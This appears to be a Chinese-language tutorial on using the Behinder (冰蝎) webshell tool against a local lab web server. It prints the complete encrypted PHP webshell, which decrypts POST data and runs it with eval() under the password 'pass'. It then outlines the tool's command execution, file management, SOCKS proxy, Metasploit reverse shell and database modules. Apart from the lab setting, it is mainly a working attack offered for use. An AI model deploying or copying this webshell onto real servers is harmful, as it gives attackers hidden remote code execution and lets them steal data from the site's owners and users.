冰蝎常规使用

环境搭建

Web服务器： 本地 win2003（phpstudy搭建）
攻击工具： 冰蝎+kali

具体实施步骤

1、上传webshell

原理参考——>点击
和普通一句话木马类似，需要连接密码。此处为 pass

@error_reporting(0);
session_start();
if (isset($_GET['pass']))
{
    $key=substr(md5(uniqid(rand())),16);
    $_SESSION['k']=$key;
    print $key;
}
else
{
    $key=$_SESSION['k'];
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __construct($p) {eval($p."");}}
	@new C($params);
}
?>

2、用冰蝎连接

双击增加的链接显示出phpinfo()即成功！

3、各个模块使用

3.1 命令执行

3.2 虚拟终端

3.3 文件管理

3.4 Socks代理

注：这个是开在本地的，可监控web服务器的流量

3.5 反弹shell

结合kali里的msf
在kali上开启侦听：

然后在冰蝎上点击“给我连”

3.6数据库管理

冰蝎基本使用至此结束！
附冰蝎连接：https://github.com/rebeyond/Behinder